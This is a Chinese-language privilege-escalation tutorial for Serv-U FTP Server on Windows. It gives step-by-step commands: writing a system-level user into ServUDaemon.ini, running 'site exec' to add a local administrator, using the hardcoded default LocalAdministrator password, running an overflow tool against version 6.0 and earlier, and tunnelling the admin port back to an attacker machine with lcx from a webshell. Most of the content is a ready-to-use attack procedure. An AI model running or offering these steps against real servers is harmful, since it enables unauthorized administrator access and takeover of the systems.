0x00 serv-u简介
- Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
- serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
- serv-u密码文件:ServUDaemon.ini
- 端口号:默认端口是43958
ServUDaemon.ini中lccalsetuportNo=端口
0x01 FTP提权方法
1、有修改权限
2、无权限修改
3、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)
4、serv-u ftp转发端口
0x02 有修改权限
步骤如下:
1、判断是否安装serv-u
nmap扫端口确认
2、检查是否有可写权限
一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini
3、在serv-u中添加用户
在user4=添加一个系统用户
[USER=quan|1] //用户名
Password= //用户密码加密后的密文
HomeDir=c:\ftp\quan //目录
RelPaths=3
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:\|RWAMELCDP //可访问的目录及权限
Access2=d:\|RWAMELCDP //可访问的目录及权限
Access3=e:\|RWAMELCDP //可访问的目录及权限
SKEYValues=
password=2位随机字符+md5(2位随机字符+123456)
4、连接目标FTP服务器
ftp 目标IP地址 刚添加的用户密码
5、利用ftp命令quote site exec
添加用户加入administrators权限组
quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add
0x03 无修改权限
1、利用md5 直接去解密
2、默认用户名密码
账户:LocalAdministrator ,密码:#l@$ak#.lk;0@P
命令:
cmd /c net user quan quan123 /add & net localgroup administrators quan /add
3、不是默认密码时
直接把SerUAdmin.exe 下载下来
用winhex打开查找LocalAdministrator(选择ANSI字符)进行查找密码
0x04 serv-u ftp本地溢出权限提升(使用6.0以及以前版本)
步骤如下:
1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下
比如是d盘
3、执行命令
d:\serv_u.exe
d:\serv_u.exe “net user quan quan123 /add”
d:\serv_u.exe “net localgroup administrators quan /add”
注意命令要有引号
0x05 serv-u ftp转发端口
1、lcx端口转发
在目标Webshell上运行LCX命令
lcx -slave yourIP 5000 127.0.0.1 43958
在本机上运行
lcx -listen 5000 21
2、本机登陆Serv_U
打开本地的SERV_U 在IP上填入127.0.0.1
帐号写LocalAdministrator 密码#l@$ak#.lk;0@P
0x06 参考
https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html